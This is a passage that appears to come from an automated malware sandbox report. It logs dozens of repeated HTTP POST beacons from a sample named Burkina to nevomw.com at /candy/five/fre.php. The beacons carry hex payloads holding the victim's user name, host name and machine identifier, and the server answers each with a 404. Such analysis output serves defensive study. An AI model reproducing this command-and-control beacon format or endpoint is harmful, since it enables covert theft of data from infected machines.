                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:53:31.090195894 CET1415OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:53:31.164427042 CET1415INHTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:53:31 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            104192.168.2.64984645.144.3.23480C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            TimestampkBytes transferredDirectionData
                                            Dec 2, 2020 11:53:31.503457069 CET1416OUTPOST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:53:31.556354046 CET1416OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:53:31.630878925 CET1416INHTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:53:31 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            105192.168.2.64984745.144.3.23480C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            TimestampkBytes transferredDirectionData
                                            Dec 2, 2020 11:53:31.875174999 CET1417OUTPOST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:53:31.927525997 CET1418OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:53:32.010010004 CET1418INHTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:53:31 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            106192.168.2.64984845.144.3.23480C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            TimestampkBytes transferredDirectionData
                                            Dec 2, 2020 11:53:32.306005955 CET1419OUTPOST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:53:32.358225107 CET1419OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:53:32.430725098 CET1419INHTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:53:32 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            107192.168.2.64984945.144.3.23480C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            TimestampkBytes transferredDirectionData
                                            Dec 2, 2020 11:53:32.677638054 CET1420OUTPOST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:53:32.732115984 CET1420OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:53:32.804538965 CET1421INHTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:53:32 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            108192.168.2.64985045.144.3.23480C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            TimestampkBytes transferredDirectionData
                                            Dec 2, 2020 11:53:33.088546991 CET1422OUTPOST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:53:33.142995119 CET1422OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:53:33.217117071 CET1422INHTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:53:33 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            109192.168.2.64985145.144.3.23480C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            TimestampkBytes transferredDirectionData
                                            Dec 2, 2020 11:53:33.527612925 CET1424OUTPOST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:53:33.580550909 CET1424OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:53:33.653285980 CET1425INHTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:53:33 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            11192.168.2.64972445.144.3.23480C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            TimestampkBytes transferredDirectionData
                                            Dec 2, 2020 11:52:47.619406939 CET86OUTPOST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:52:47.672055006 CET86OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:52:47.748179913 CET87INHTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:52:47 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            110192.168.2.64985345.144.3.23480C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            TimestampkBytes transferredDirectionData
                                            Dec 2, 2020 11:53:33.937055111 CET1431OUTPOST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:53:33.989012957 CET1434OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:53:34.063106060 CET1438INHTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:53:34 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            111192.168.2.64985445.144.3.23480C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            TimestampkBytes transferredDirectionData
                                            Dec 2, 2020 11:53:34.366689920 CET1439OUTPOST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:53:34.422066927 CET1439OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:53:34.511687994 CET1440INHTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:53:34 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            112192.168.2.64985545.144.3.23480C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            TimestampkBytes transferredDirectionData
                                            Dec 2, 2020 11:53:34.808233976 CET1440OUTPOST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:53:34.861234903 CET1441OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:53:34.935148001 CET1441INHTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:53:34 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            113192.168.2.64985645.144.3.23480C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            TimestampkBytes transferredDirectionData
                                            Dec 2, 2020 11:53:35.232012987 CET1442OUTPOST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:53:35.284406900 CET1442OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:53:35.356287003 CET1442INHTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:53:35 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            114192.168.2.64985745.144.3.23480C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            TimestampkBytes transferredDirectionData
                                            Dec 2, 2020 11:53:35.626805067 CET1443OUTPOST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:53:35.680749893 CET1444OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:53:35.766350031 CET1444INHTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:53:35 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            115192.168.2.64985845.144.3.23480C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            TimestampkBytes transferredDirectionData
                                            Dec 2, 2020 11:53:36.022089958 CET1445OUTPOST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:53:36.075316906 CET1445OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:53:36.150350094 CET1445INHTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:53:36 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            116192.168.2.64985945.144.3.23480C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            TimestampkBytes transferredDirectionData
                                            Dec 2, 2020 11:53:36.435767889 CET1446OUTPOST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:53:36.488735914 CET1447OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:53:36.561460018 CET1447INHTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:53:36 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            117192.168.2.64986045.144.3.23480C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            TimestampkBytes transferredDirectionData
                                            Dec 2, 2020 11:53:36.878453016 CET1448OUTPOST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:53:36.931330919 CET1448OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:53:37.006664038 CET1448INHTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:53:36 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            118192.168.2.64986145.144.3.23480C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            TimestampkBytes transferredDirectionData
                                            Dec 2, 2020 11:53:37.316129923 CET1449OUTPOST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:53:37.369921923 CET1449OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:53:37.454833031 CET1450INHTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:53:37 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            119192.168.2.64986245.144.3.23480C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            TimestampkBytes transferredDirectionData
                                            Dec 2, 2020 11:53:37.757545948 CET1451OUTPOST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:53:37.810399055 CET1451OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:53:37.885756016 CET1451INHTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:53:37 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            12192.168.2.64972545.144.3.23480C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            TimestampkBytes transferredDirectionData
                                            Dec 2, 2020 11:52:48.049426079 CET87OUTPOST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:52:48.111213923 CET88OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:52:48.184302092 CET88INHTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:52:48 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            120192.168.2.64986345.144.3.23480C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            TimestampkBytes transferredDirectionData
                                            Dec 2, 2020 11:53:38.181313038 CET1452OUTPOST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
